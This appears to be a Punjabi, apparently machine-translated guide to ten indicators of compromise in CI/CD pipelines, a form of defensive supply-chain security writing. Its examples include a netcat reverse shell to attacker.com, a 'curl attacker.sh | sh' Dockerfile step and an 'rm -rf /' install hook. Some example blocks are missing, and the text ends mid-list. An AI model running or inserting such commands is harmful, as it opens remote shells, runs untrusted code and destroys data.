ਜਾਣ-ਪਛਾਣ: ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਵਿੱਚ ਸਮਝੌਤਾ ਦੇ ਸੂਚਕ ਕੀ ਹਨ?
ਸਮਝੌਤਾ ਦੇ ਸੰਕੇਤ ਪਹਿਲੇ ਚੇਤਾਵਨੀ ਸੰਕੇਤ ਹਨ ਕਿ ਤੁਹਾਡਾ ਸਿਸਟਮ ਜਾਂ pipeline ਹਮਲੇ ਦੇ ਅਧੀਨ ਹੋ ਸਕਦਾ ਹੈ। ਸਰਲ ਸ਼ਬਦਾਂ ਵਿੱਚ, ਸਮਝੌਤੇ ਦੇ ਸੰਕੇਤਕ ਹਮਲਾਵਰਾਂ ਦੁਆਰਾ ਛੱਡੇ ਗਏ ਨਿਸ਼ਾਨ ਹਨ, ਜਿਵੇਂ ਅਜੀਬ logins, ਫਾਈਲ ਬਦਲਾਅ, ਜਾਂ ਲੁਕਿਆ ਹੋਇਆ ਮਾਲਵੇਅਰ। ਵਿੱਚ ਆਈਓਸੀ ਸਾਈਬਰ ਸੁਰੱਖਿਆ, ਉਹ ਅਪਰਾਧ ਵਾਲੀ ਥਾਂ 'ਤੇ ਉਂਗਲਾਂ ਦੇ ਨਿਸ਼ਾਨ ਵਾਂਗ ਕੰਮ ਕਰਦੇ ਹਨ, ਤੁਹਾਨੂੰ ਸਪੱਸ਼ਟ ਸਬੂਤ ਦਿੰਦੇ ਹਨ ਕਿ ਕੁਝ ਗਲਤ ਹੈ। ਇਸ ਲਈ, ਜਦੋਂ ਡਿਵੈਲਪਰ ਪੁੱਛਦੇ ਹਨ ਸਮਝੌਤੇ ਦੇ ਸੰਕੇਤ ਕੀ ਹਨ?, ਜਵਾਬ ਸਰਵਰਾਂ ਜਾਂ ਫਾਇਰਵਾਲਾਂ ਤੱਕ ਸੀਮਿਤ ਨਹੀਂ ਹੈ, ਇਸ ਵਿੱਚ ਆਧੁਨਿਕ ਵਿੱਚ ਛੁਪੇ ਜੋਖਮ ਵੀ ਸ਼ਾਮਲ ਹਨ CI/CD pipelines.
ਇਨ੍ਹਾਂ ਵਿੱਚ pipelines, ਹਮਲਾਵਰ ਕੋਡ ਨਾਲ ਛੇੜਛਾੜ ਕਰ ਸਕਦੇ ਹਨ, ਖਤਰਨਾਕ ਨਿਰਭਰਤਾਵਾਂ ਨੂੰ ਇੰਜੈਕਟ ਕਰ ਸਕਦੇ ਹਨ, ਜਾਂ ਬਿਨਾਂ ਧਿਆਨ ਦਿੱਤੇ ਬਿਲਡ ਸਟੈਪਸ ਨੂੰ ਬਦਲ ਸਕਦੇ ਹਨ। ਹਾਲਾਂਕਿ, ਜ਼ਿਆਦਾਤਰ ਗਾਈਡ ਅਜੇ ਵੀ ਸਿਰਫ਼ ਸਰਵਰਾਂ ਜਾਂ ਨੈੱਟਵਰਕਾਂ 'ਤੇ ਕੇਂਦ੍ਰਤ ਕਰਦੇ ਹਨ। ਨਤੀਜੇ ਵਜੋਂ, ਸਾਫਟਵੇਅਰ ਸਪਲਾਈ ਚੇਨ ਸਭ ਤੋਂ ਆਸਾਨ ਨਿਸ਼ਾਨਿਆਂ ਵਿੱਚੋਂ ਇੱਕ ਬਣ ਗਈ ਹੈ।
ਇਸੇ ਲਈ ਸਮਝੌਤੇ ਦੇ ਸੰਕੇਤ ਲੱਭਣੇ CI/CD pipelines ਜ਼ਰੂਰੀ ਹੈ। ਸਭ ਤੋਂ ਵੱਧ, ਇਹ ਟੀਮਾਂ ਨੂੰ ਮਾਲਵੇਅਰ ਨੂੰ ਰੋਕਣ, ਰਾਜ਼ਾਂ ਦੀ ਰੱਖਿਆ ਕਰਨ ਅਤੇ ਸਾਫਟਵੇਅਰ ਡਿਲੀਵਰੀ ਦੇ ਹਰ ਪੜਾਅ ਨੂੰ ਸੁਰੱਖਿਅਤ ਕਰਨ ਵਿੱਚ ਮਦਦ ਕਰਦਾ ਹੈ।
ਵਿੱਚ ਸਮਝੌਤਾ ਕਰਨ ਦੇ ਸਿਖਰਲੇ 10 ਸੂਚਕ CI/CD Pipelines
ਸਮਝੌਤਾ ਦੇ ਸੂਚਕਾਂ ਦੀ ਵਿਆਖਿਆ ਕਰਦੇ ਸਮੇਂ, ਜ਼ਿਆਦਾਤਰ ਸੂਚੀਆਂ ਸਰਵਰਾਂ ਜਾਂ ਨੈੱਟਵਰਕਾਂ 'ਤੇ ਕੇਂਦ੍ਰਿਤ ਹੁੰਦੀਆਂ ਹਨ। ਫਿਰ ਵੀ CI/CD pipelines, ਹਮਲਾਵਰ ਬਹੁਤ ਵੱਖਰੇ ਫਿੰਗਰਪ੍ਰਿੰਟ ਛੱਡਦੇ ਹਨ। ਇਹਨਾਂ ਸਿਗਨਲਾਂ ਨੂੰ ਪਛਾਣਨਾ ਸਰਗਰਮ ਬਚਾਅ ਲਈ ਬਹੁਤ ਜ਼ਰੂਰੀ ਹੈ। ਹੇਠਾਂ 10 IOC ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਲਾਲ ਝੰਡੇ ਹਨ ਜਿਨ੍ਹਾਂ 'ਤੇ ਹਰ ਡਿਵੈਲਪਰ ਅਤੇ ਸੁਰੱਖਿਆ ਇੰਜੀਨੀਅਰ ਨੂੰ ਨਜ਼ਰ ਰੱਖਣੀ ਚਾਹੀਦੀ ਹੈ।
1. ਸ਼ੱਕੀ ਨਿਰਭਰਤਾ ਬਦਲਾਅ
ਵਿੱਚ ਸਮਝੌਤਾ ਦੇ ਮੁੱਖ ਸੂਚਕਾਂ ਵਿੱਚੋਂ ਇੱਕ pipelines ਇੱਕ ਅਚਾਨਕ, ਅਜੀਬ ਨਿਰਭਰਤਾ ਅੱਪਡੇਟ ਹੈ। ਹਮਲਾਵਰ ਅਕਸਰ ਖਤਰਨਾਕ ਪੈਕੇਜ ਜੋੜਨ ਲਈ ਪੈਕੇਜ ਮੈਨੇਜਰਾਂ ਵਿੱਚ ਡਿਵੈਲਪਰਾਂ ਦੇ ਭਰੋਸੇ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹਨ।
ਉਦਾਹਰਣ ਵਜੋਂ, npm a ਵਿੱਚ package.json ਫਰਕ ਵਿੱਚ ਅਚਾਨਕ ਸ਼ਾਮਲ ਹੋ ਸਕਦੇ ਹਨ:
ਅਜਿਹੇ ਬਦਲਾਅ ਸੁਰੱਖਿਅਤ ਲੱਗ ਸਕਦੇ ਹਨ ਪਰ ਹਰੇਕ ਬਿਲਡ ਵਿੱਚ ਟ੍ਰੋਜਨਾਈਜ਼ਡ ਕੋਡ ਲਗਾ ਸਕਦੇ ਹਨ।
ਅਸਰ: ਸਮਝੌਤਾ ਕੀਤੇ ਬਿਲਡ ਸਰੋਤ 'ਤੇ ਮਾਲਵੇਅਰ ਪ੍ਰਾਪਤ ਕਰਦੇ ਹਨ।
ਖੋਜ: ਨਿਰਭਰਤਾ ਸਮੀਖਿਆਵਾਂ ਲਾਗੂ ਕਰੋ, ਲਾਕਫਾਈਲ ਅੰਤਰਾਂ ਨੂੰ ਟਰੈਕ ਕਰੋ, ਅਤੇ ਹਰ ਸਮੇਂ ਨਵੇਂ ਪੈਕੇਜਾਂ ਨੂੰ ਸਕੈਨ ਕਰੋ।
2. ਬਿਲਡਸ ਵਿੱਚ ਅਸਪਸ਼ਟ ਕੋਡ
ਮਾਲਵੇਅਰ ਲੇਖਕ ਸਮੀਖਿਆਵਾਂ ਨੂੰ ਬਾਈਪਾਸ ਕਰਨ ਲਈ ਗੁੰਝਲਦਾਰਤਾ 'ਤੇ ਨਿਰਭਰ ਕਰਦੇ ਹਨ। ਨਤੀਜੇ ਵਜੋਂ, ਸਮਝੌਤਾ ਦਾ ਇਹ ਸੂਚਕ CI/CD pipelines ਨੂੰ ਫੜਨਾ ਸਭ ਤੋਂ ਔਖਾ ਹੋ ਸਕਦਾ ਹੈ। ਦਰਅਸਲ, ਗੁੰਝਲਦਾਰ ਪੇਲੋਡ ਅਕਸਰ ਬਿਨਾਂ ਕਿਸੇ ਨੋਟਿਸ ਦੇ ਓਪਨ ਸੋਰਸ ਲਾਇਬ੍ਰੇਰੀਆਂ ਜਾਂ ਕੰਟੇਨਰ ਚਿੱਤਰਾਂ ਵਿੱਚ ਖਿਸਕ ਜਾਂਦੇ ਹਨ।
ਉਦਾਹਰਣ ਲਈ:
- ਇੱਕ PyPI ਪੈਕੇਜ ਜੋ ਵਰਤਦਾ ਹੈ
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - ਇੱਕ ਡੌਕਰ ਚਿੱਤਰ ਜੋ ਗੈਰ-ਜ਼ਰੂਰੀ UPX ਬਾਈਨਰੀਆਂ ਨਾਲ ਭਰਿਆ ਹੋਇਆ ਹੈ।
- ਜਾਵਾ ਸਕ੍ਰਿਪਟ ਨਾਲ ਭਰਪੂਰ
\x41\x42ਪ੍ਰਮਾਣ ਪੱਤਰ ਚੋਰੀ ਕਰਨ ਵਾਲਿਆਂ ਨੂੰ ਲੁਕਾ ਕੇ ਬਚ ਨਿਕਲਦਾ ਹੈ।
ਅਸਰ: ਲੁਕਿਆ ਹੋਇਆ ਕੋਡ ਬਿਲਡ ਜਾਂ ਰਨਟਾਈਮ ਦੌਰਾਨ ਚੁੱਪਚਾਪ ਚੱਲਦਾ ਹੈ, ਜੋ ਇਸਨੂੰ IOC ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਵਿੱਚ ਇੱਕ ਮਹੱਤਵਪੂਰਨ ਸੰਕੇਤ ਬਣਾਉਂਦਾ ਹੈ।
ਖੋਜ: ਜੁੜੋ SAST ਏਨਕੋਡ ਕੀਤੇ ਜਾਂ ਪੈਕ ਕੀਤੇ ਕੋਡ ਨੂੰ ਫਲੈਗ ਕਰਨ ਲਈ ਮਾਲਵੇਅਰ ਸਕੈਨਿੰਗ ਦੇ ਨਾਲ। ਸਭ ਤੋਂ ਵੱਧ, ਗੁੰਝਲਦਾਰਤਾ ਨੂੰ ਇੱਕ ਲਾਲ ਝੰਡੇ ਵਜੋਂ ਸਮਝੋ ਜੋ ਹੋਰ ਜਾਂਚ ਦੇ ਹੱਕਦਾਰ ਹੈ।
3. ਗਿੱਟ ਵਿੱਚ ਉਜਾਗਰ ਹੋਏ ਰਾਜ਼: ਇੱਕ ਕਲਾਸਿਕ ਆਈਓਸੀ ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਜੋਖਮ
CI/CD pipelineਅਕਸਰ ਰਿਪੋਜ਼ਟਰੀਆਂ ਤੋਂ ਸਿੱਧੇ ਰਾਜ਼ ਪ੍ਰਾਪਤ ਕਰਦੇ ਹਨ। ਹਾਲਾਂਕਿ, ਜਦੋਂ ਗਿੱਟ ਵਿੱਚ ਰਾਜ਼ ਦਿਖਾਈ ਦਿੰਦੇ ਹਨ, ਉਹ ਇਸ ਸਵਾਲ ਦੇ ਸਭ ਤੋਂ ਸਪੱਸ਼ਟ ਜਵਾਬਾਂ ਵਿੱਚੋਂ ਇੱਕ ਬਣ ਜਾਂਦੇ ਹਨ "ਸਮਝੌਤੇ ਦੇ ਸੰਕੇਤ ਕੀ ਹਨ" pipelines?” ਇੱਕ ਵਾਰ ਜਦੋਂ ਪ੍ਰਮਾਣ ਪੱਤਰ Git ਵਿੱਚ ਆ ਜਾਂਦੇ ਹਨ, ਤਾਂ ਹਮਲਾਵਰ ਉਹਨਾਂ ਦਾ ਅਣਮਿੱਥੇ ਸਮੇਂ ਲਈ ਸ਼ੋਸ਼ਣ ਕਰ ਸਕਦੇ ਹਨ।
ਉਦਾਹਰਣ ਲਈ:
- A
.envਫਾਈਲ ਜਿਸ ਵਿੱਚAWS_SECRET_KEY=. - ਟੋਕਨ ਧੱਕੇ ਗਏ
config.json. - ਹਟਾਉਣ ਤੋਂ ਬਾਅਦ ਵੀ Git ਇਤਿਹਾਸ ਵਿੱਚ ਰਾਜ਼ ਅਜੇ ਵੀ ਦਿਖਾਈ ਦਿੰਦੇ ਹਨ।
ਅਸਰ: ਖੁੱਲ੍ਹੀਆਂ ਕੁੰਜੀਆਂ ਹਮਲਾਵਰਾਂ ਨੂੰ ਸਿੱਧੀ ਪਹੁੰਚ ਦਿੰਦੀਆਂ ਹਨ CI/CD pipelines, ਕਲਾਉਡ ਸਿਸਟਮ, ਜਾਂ ਡੇਟਾਬੇਸ। ਇਸ ਲਈ ਇਹ ਸਮਝੌਤਾ ਦੇ ਸਭ ਤੋਂ ਖਤਰਨਾਕ ਸੰਕੇਤਾਂ ਵਿੱਚੋਂ ਇੱਕ ਹੈ।
ਖੋਜ: ਵਰਤੋ pre-commit hooks ਅਤੇ ਗੁਪਤ ਸਕੈਨਿੰਗ ਲਈ CI ਨੌਕਰੀਆਂ, ਅਤੇ ਲੀਕ ਹੋਈਆਂ ਕੁੰਜੀਆਂ ਨੂੰ ਤੁਰੰਤ ਰੱਦ ਕਰੋ। ਇਸ ਤੋਂ ਇਲਾਵਾ, ਐਕਸਪੋਜ਼ਰ ਵਿੰਡੋਜ਼ ਨੂੰ ਘਟਾਉਣ ਲਈ ਆਟੋਮੇਟਿਡ ਰਿਮੀਡੀਏਸ਼ਨ ਲਾਗੂ ਕਰੋ।
4. ਛੇੜਛਾੜ Pipeline ਸੰਰਚਨਾਵਾਂ: ਸਮਝੌਤੇ ਦੇ ਲੁਕਵੇਂ ਸੰਕੇਤ
Pipeline ਕੌਂਫਿਗ ਉੱਚ-ਮੁੱਲ ਵਾਲੇ ਟੀਚੇ ਹਨ ਕਿਉਂਕਿ ਇੱਕ ਸਿੰਗਲ ਸੋਧ ਅਕਸਰ ਪੂਰੇ ਵਰਕਫਲੋ ਨੂੰ ਹਾਈਜੈਕ ਕਰ ਲੈਂਦੀ ਹੈ।. ਸਿੱਟੇ ਵਜੋਂ, ਛੇੜਛਾੜ ਕੀਤੀ ਗਈ pipeline ਫਾਈਲਾਂ ਇੱਕ ਵੱਡਾ IOC ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਜੋਖਮ ਹਨ ਜਿਸਦਾ ਰਵਾਇਤੀ ਨਿਗਰਾਨੀ ਸਾਧਨ ਘੱਟ ਹੀ ਪਤਾ ਲਗਾਉਂਦੇ ਹਨ।
ਉਦਾਹਰਣ ਲਈ:
GitHub ਐਕਸ਼ਨਾਂ ਵਿੱਚ:
- ਗਿੱਟਲੈਬ ਵਿੱਚ: ਇੱਕ ਖਤਰਨਾਕ ਨੌਕਰੀ ਜੋੜੀ ਗਈ
.gitlab-ci.ymlਜੋ ਸੰਵੇਦਨਸ਼ੀਲ ਡੇਟਾ ਨੂੰ ਡੰਪ ਕਰਦਾ ਹੈ। - ਜੇਨਕਿੰਸ ਵਿੱਚ:
sh "nc -e /bin/bash attacker.com 4444".
ਅਸਰ: ਇਹ ਗੈਰ-ਮਨਜ਼ੂਰਸ਼ੁਦਾ ਤਬਦੀਲੀਆਂ ਤੁਹਾਡੇ pipeline ਹਮਲਾਵਰਾਂ ਲਈ ਇੱਕ ਸਥਾਈ ਪਿਛਲੇ ਦਰਵਾਜ਼ੇ ਵਿੱਚ, ਜੋ ਸਪੱਸ਼ਟ ਤੌਰ 'ਤੇ ਸਮਝੌਤੇ ਦੇ ਸੂਚਕ ਵਜੋਂ ਗਿਣਿਆ ਜਾਂਦਾ ਹੈ।
ਖੋਜ: ਦਸਤਖਤ ਕੀਤੇ ਸੰਰਚਨਾਵਾਂ ਨੂੰ ਲਾਗੂ ਕਰੋ, ਪੀਆਰ ਪ੍ਰਵਾਨਗੀਆਂ ਦੀ ਲੋੜ ਹੈ, ਅਤੇ ਅਣਕਿਆਸੇ ਕੰਮਾਂ ਲਈ ਨਿਗਰਾਨੀ ਕਰੋ। ਇਸ ਤੋਂ ਇਲਾਵਾ, ਸੈੱਟ ਕਰੋ guardrails ਜੋ ਬਦਲੇ ਹੋਏ ਵਰਕਫਲੋ ਨੂੰ ਆਪਣੇ ਆਪ ਬਲੌਕ ਕਰ ਦਿੰਦੇ ਹਨ।
5. ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰ ਪ੍ਰਾਪਤ IaC ਮੂਲ
ਗਲਤ ਸੰਰਚਿਤ ਬੁਨਿਆਦੀ ਢਾਂਚੇ ਦੀਆਂ ਪਰਿਭਾਸ਼ਾਵਾਂ ਅਕਸਰ ਲੁਕਵੇਂ ਬੈਕਡੋਰ ਬਣਾਉਂਦੀਆਂ ਹਨ। ਨਤੀਜੇ ਵਜੋਂ, ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰ ਪ੍ਰਾਪਤ ਡਿਫਾਲਟ IaC ਇੱਕ ਕਲਾਸਿਕ ਆਈਓਸੀ ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਜੋਖਮ ਹਨ।
ਉਦਾਹਰਣ ਲਈ:
- ਇੱਕ ਕੁਬਰਨੇਟਸ ਤੈਨਾਤੀ ਗ੍ਰਾਂਟਿੰਗ ਪੌਡਸ
privileged: true. - ਹੈਲਮ ਚਾਰਟ ਸੇਵਾਵਾਂ ਦਾ ਪਰਦਾਫਾਸ਼ ਕਰਦੇ ਹਨ
0.0.0.0:22.
ਅਸਰ: ਹਮਲਾਵਰ ਰੂਟ-ਪੱਧਰ ਦੀ ਪਹੁੰਚ ਪ੍ਰਾਪਤ ਕਰਦੇ ਹਨ ਜਾਂ ਅੰਦਰੂਨੀ ਸੇਵਾਵਾਂ ਨੂੰ ਜਨਤਕ ਤੌਰ 'ਤੇ ਪ੍ਰਗਟ ਕਰਦੇ ਹਨ। ਸਿੱਟੇ ਵਜੋਂ, ਇਹ ਮੁੱਦੇ ਹਮਲੇ ਦੀ ਸਤ੍ਹਾ ਨੂੰ ਕਾਫ਼ੀ ਵਧਾਉਂਦੇ ਹਨ।
ਖੋਜ: ਲਾਗੂ ਕਰੋ IaC ਮਿਲਾਨ ਤੋਂ ਪਹਿਲਾਂ ਘੱਟੋ-ਘੱਟ ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰ ਲਾਗੂ ਕਰਨ ਲਈ ਸਕੈਨਿੰਗ। ਇਸ ਤੋਂ ਇਲਾਵਾ, ਯਕੀਨੀ ਬਣਾਓ ਕਿ ਹਰੇਕ ਸੰਰਚਨਾ ਦੀ ਸਮੀਖਿਆ ਦੇ ਹਿੱਸੇ ਵਜੋਂ ਕੀਤੀ ਗਈ ਹੈ pipeline.
6. ਅਸਾਧਾਰਨ ਬਣਤਰ ਵਾਲੇ ਵਿਵਹਾਰ
ਹਮਲਾਵਰ ਅਕਸਰ ਬਦਲਦੇ ਰਹਿੰਦੇ ਹਨ pipeline ਦੁਰਵਿਵਹਾਰ ਕਰਨ ਵਾਲੇ ਕੰਮਾਂ ਵਿੱਚ ਫਸਣ ਲਈ ਵਿਵਹਾਰ। ਦੂਜੇ ਸ਼ਬਦਾਂ ਵਿੱਚ, ਅਸਾਧਾਰਨ ਨਿਰਮਾਣ ਗਤੀਵਿਧੀ ਸਮਝੌਤਾ ਦੇ ਸੰਕੇਤਾਂ ਦੇ ਸਭ ਤੋਂ ਸਪੱਸ਼ਟ ਜਵਾਬਾਂ ਵਿੱਚੋਂ ਇੱਕ ਹੈ CI/CD pipelines.
ਉਦਾਹਰਣ ਲਈ:
- ਅਜੀਬ ਡੋਮੇਨਾਂ ਲਈ ਆਊਟਬਾਊਂਡ ਨੈੱਟਵਰਕ ਬੇਨਤੀਆਂ ਕਰਨ ਲਈ ਬਿਲਡ ਕਰਦਾ ਹੈ।
- ਇੱਕ Node.js ਪ੍ਰੋਜੈਕਟ ਅਚਾਨਕ PowerShell ਪੈਦਾ ਕਰ ਰਿਹਾ ਹੈ
npm install. - ਬਿਲਡ ਸਕ੍ਰਿਪਟਾਂ ਵਿੱਚ ਪਰਿਭਾਸ਼ਿਤ ਨਾ ਹੋਣ ਵਾਲੀਆਂ ਵੱਡੀਆਂ ਬਾਈਨਰੀਆਂ ਨੂੰ ਡਾਊਨਲੋਡ ਕਰਨ ਵਾਲਾ ਇੱਕ CI ਕੰਮ।
ਅਸਰ: ਖਰਾਬ ਬਿਲਡ ਮਾਲਵੇਅਰ ਵੰਡ ਬਿੰਦੂਆਂ ਵਜੋਂ ਕੰਮ ਕਰ ਸਕਦੇ ਹਨ। ਸਭ ਤੋਂ ਵੱਧ, ਉਹ ਹਰੇਕ ਤੈਨਾਤੀ ਵਿੱਚ ਖਤਰਨਾਕ ਪੇਲੋਡ ਫੈਲਾਉਂਦੇ ਹਨ।
ਖੋਜ: ਅਣਕਿਆਸੇ ਪ੍ਰਕਿਰਿਆਵਾਂ ਜਾਂ ਕਨੈਕਸ਼ਨਾਂ ਲਈ ਬਿਲਡ ਲੌਗਸ ਦੀ ਨਿਗਰਾਨੀ ਕਰੋ। ਇਸ ਤੋਂ ਇਲਾਵਾ, ਆਦਰਸ਼ ਤੋਂ ਬਾਹਰ ਦੇ ਵਿਵਹਾਰਾਂ ਨੂੰ ਫਲੈਗ ਕਰਨ ਲਈ ਅਨਿਯਮਤਾ ਖੋਜ ਨੂੰ ਕੌਂਫਿਗਰ ਕਰੋ।
7. ਆਈਓਸੀ ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਜੋਖਮਾਂ ਵਜੋਂ ਖਤਰਨਾਕ ਪੈਕੇਜ ਸਕ੍ਰਿਪਟਾਂ
ਪੈਕੇਜ ਮੈਨੇਜਰ ਜੀਵਨ ਚੱਕਰ ਦਾ ਸਮਰਥਨ ਕਰਦੇ ਹਨ hooks ਜਿਸਦਾ ਹਮਲਾਵਰ ਸ਼ੋਸ਼ਣ ਕਰਦੇ ਹਨ। ਇਸ ਲਈ, npm, PyPI, ਜਾਂ Dockerfiles ਵਿੱਚ ਖਤਰਨਾਕ ਸਕ੍ਰਿਪਟਾਂ ਸਮਝੌਤਾ ਦੇ ਮਜ਼ਬੂਤ ਸੰਕੇਤ ਹਨ।
ਉਦਾਹਰਣ ਲਈ:
- ਐਨਪੀਐਮ:
postinstallਸਕ੍ਰਿਪਟ ਚੱਲ ਰਹੀ ਹੈrm -rf /ਜਾਂ C2 ਤੇ ਬੀਕਨਿੰਗ। - ਪੀਆਈਪੀਆਈ:
setup.pyਇੰਸਟਾਲ ਕਰਨ 'ਤੇ ਲੁਕਿਆ ਹੋਇਆ ਪਾਈਥਨ ਕੋਡ ਲਾਗੂ ਕਰਨਾ। - ਡੌਕਰਫਾਈਲ:
RUN curl attacker.sh | sh.
ਅਸਰ: ਹਮਲਾ ਇੰਸਟਾਲੇਸ਼ਨ ਦੌਰਾਨ ਹੁੰਦਾ ਹੈ, ਕਿਸੇ ਵੀ ਰਨਟਾਈਮ ਟੈਸਟਿੰਗ ਤੋਂ ਪਹਿਲਾਂ। ਨਤੀਜੇ ਵਜੋਂ, ਡਿਵੈਲਪਰ ਕਦੇ ਵੀ ਇਸ ਵੱਲ ਧਿਆਨ ਨਹੀਂ ਦੇ ਸਕਦੇ ਜਦੋਂ ਤੱਕ ਕਿ ਬਹੁਤ ਦੇਰ ਨਾ ਹੋ ਜਾਵੇ।
ਖੋਜ: ਇੰਸਟਾਲ ਸਕ੍ਰਿਪਟਾਂ ਲਈ ਸਕੈਨ ਪੈਕੇਜ ਮੈਨੀਫੈਸਟ। ਇਸ ਤੋਂ ਇਲਾਵਾ, ਜੋਖਮ ਭਰੇ ਨੂੰ ਸੀਮਤ ਕਰੋ hooks in CI/CD ਐਕਸਪੋਜਰ ਘਟਾਉਣ ਲਈ ਨੌਕਰੀਆਂ।
8. ਰਜਿਸਟਰੀ ਜ਼ਹਿਰ ਸਮਝੌਤਾ ਦੇ ਸੰਕੇਤਕ
ਹਮਲਾਵਰ ਰਜਿਸਟਰੀਆਂ ਵਿੱਚ ਕਲਾਕ੍ਰਿਤੀਆਂ ਨੂੰ ਬਦਲਦੇ ਜਾਂ ਸੋਧਦੇ ਹਨ, ਅਤੇ ਇਹ ਘਟਨਾਵਾਂ ਸਪਲਾਈ ਲੜੀ ਵਿੱਚ ਸਮਝੌਤਾ ਦੇ ਸੰਕੇਤਕ ਕੀ ਹਨ, ਇਸ ਦੀਆਂ ਪਾਠ ਪੁਸਤਕ ਉਦਾਹਰਣਾਂ ਹਨ। pipelines.
ਉਦਾਹਰਣ ਲਈ:
- ਇੱਕ ਡੌਕਰ ਚਿੱਤਰ ਟੈਗ ਨੂੰ ਇੱਕ ਟ੍ਰੋਜਨਾਈਜ਼ਡ ਪਰਤ ਨਾਲ ਚੁੱਪਚਾਪ ਅੱਪਡੇਟ ਕੀਤਾ ਗਿਆ।
- ਇੱਕ ਅੰਦਰੂਨੀ ਪੈਕੇਜ ਨੂੰ ਜ਼ਹਿਰੀਲੇ ਸੰਸਕਰਣ ਨਾਲ ਬਦਲ ਦਿੱਤਾ ਗਿਆ।
- npm ਨੇਮਸਪੇਸ ਸਕੁਐਟਿੰਗ, ਜਿਵੇਂ ਕਿ
lodash-proxy.
ਅਸਰ: ਰਜਿਸਟਰੀ ਆਰਟੀਫੈਕਟ ਦੀ ਵਰਤੋਂ ਕਰਨ ਵਾਲੀ ਹਰ ਬਿਲਡ ਨਾਲ ਸਮਝੌਤਾ ਹੋ ਜਾਂਦਾ ਹੈ। ਸਿਰਫ ਇਹ ਹੀ ਨਹੀਂ, ਬਲਕਿ ਸਮਝੌਤਾ ਡਾਊਨਸਟ੍ਰੀਮ ਸੇਵਾਵਾਂ ਤੱਕ ਫੈਲਦਾ ਹੈ।
ਖੋਜ: ਸਾਰੇ ਰਜਿਸਟਰੀ ਪੁੱਲ 'ਤੇ ਦਸਤਖਤ ਅਤੇ ਇਕਸਾਰਤਾ ਜਾਂਚਾਂ ਨੂੰ ਲਾਗੂ ਕਰੋ। ਇਸ ਤੋਂ ਇਲਾਵਾ, ਆਰਟੀਫੈਕਟ ਮੂਲ ਨੂੰ ਟ੍ਰੈਕ ਕਰੋ SBOM ਪ੍ਰਮਾਣਿਕਤਾ
9. ਆਈਓਸੀ ਸਬੂਤ ਵਜੋਂ ਅਸਾਧਾਰਨ ਉਪਭੋਗਤਾ ਗਤੀਵਿਧੀ
ਛੇੜਛਾੜ ਵਾਲੇ ਖਾਤੇ ਲਗਭਗ ਹਮੇਸ਼ਾ ਅਸਧਾਰਨ ਨਿਸ਼ਾਨ ਛੱਡ ਜਾਂਦੇ ਹਨ। ਇਸ ਅਨੁਸਾਰ, ਅਸਾਧਾਰਨ ਡਿਵੈਲਪਰ ਵਿਵਹਾਰ ਸਮਝੌਤਾ ਦਾ ਇੱਕ ਮਜ਼ਬੂਤ ਸੂਚਕ ਹੈ।
ਉਦਾਹਰਣ ਲਈ:
- Commitਸਥਾਨਕ ਸਮੇਂ ਅਨੁਸਾਰ ਸਵੇਰੇ 3 ਵਜੇ ਧੱਕਾ ਦਿੱਤਾ ਗਿਆ।
- ਛੁੱਟੀਆਂ 'ਤੇ ਖਾਤਿਆਂ ਦੁਆਰਾ ਪੀਆਰ ਪ੍ਰਵਾਨਗੀਆਂ।
- Pipelines ਅਸਾਧਾਰਨ ਬਾਰੰਬਾਰਤਾ ਨਾਲ ਚਾਲੂ ਹੁੰਦਾ ਹੈ।
ਅਸਰ: ਹਮਲਾਵਰ ਚੋਰੀ ਕੀਤੇ ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਦੀ ਦੁਰਵਰਤੋਂ ਖਤਰਨਾਕ ਤਬਦੀਲੀਆਂ ਪਾਉਣ ਲਈ ਕਰਦੇ ਹਨ। ਆਖ਼ਰਕਾਰ, ਅਣਅਧਿਕਾਰਤ commits ਆਮ ਵਰਕਫਲੋ ਵਿੱਚ ਆਸਾਨੀ ਨਾਲ ਰਲ ਜਾਂਦੇ ਹਨ।
ਖੋਜ: ਮਾਨੀਟਰ SCM ਵਿਗਾੜਾਂ ਲਈ ਗਤੀਵਿਧੀ, MFA ਲਾਗੂ ਕਰੋ, ਅਤੇ ਟੋਕਨਾਂ ਨੂੰ ਨਿਯਮਿਤ ਤੌਰ 'ਤੇ ਘੁੰਮਾਓ। ਇਸ ਤੋਂ ਇਲਾਵਾ, ਸ਼ੱਕੀ ਵਿਅਕਤੀਆਂ 'ਤੇ ਚੇਤਾਵਨੀ ਦਿਓ commit ਜਾਂ ਪ੍ਰਵਾਨਗੀ ਪੈਟਰਨ।
10. IOC ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਵਿੱਚ ਅਸਫਲ ਇਮਾਨਦਾਰੀ ਜਾਂ ਦਸਤਖਤ ਜਾਂਚਾਂ
ਇੱਕ ਆਮ ਪਰ ਅਣਦੇਖਾ ਕੀਤਾ ਗਿਆ ਸਮਝੌਤਾ ਦਾ ਸੂਚਕ ਇੱਕ ਅਸਫਲ ਇਮਾਨਦਾਰੀ ਜਾਂ ਦਸਤਖਤ ਜਾਂਚ ਹੈ। IOC ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਵਿੱਚ, ਇਹ ਜਾਂਚਾਂ ਪੁਸ਼ਟੀ ਕਰਦੀਆਂ ਹਨ ਕਿ ਕੋਡ ਜਾਂ ਕਲਾਕ੍ਰਿਤੀਆਂ ਪ੍ਰਮਾਣਿਕ ਹਨ। ਉਹਨਾਂ ਨੂੰ ਛੱਡਣ ਨਾਲ pipelineਦਾ ਪਰਦਾਫਾਸ਼ ਹੋਇਆ ਹੈ।
ਉਦਾਹਰਨਾਂ:
- ਇੱਕ SHA256 ਹੈਸ਼ ਉਮੀਦ ਕੀਤੇ ਚੈੱਕਸਮ ਨਾਲ ਮੇਲ ਨਹੀਂ ਖਾਂਦਾ।
- ਇੱਕ ਗੁੰਮ ਜਾਂ ਗਲਤ GPG ਦਸਤਖਤ।
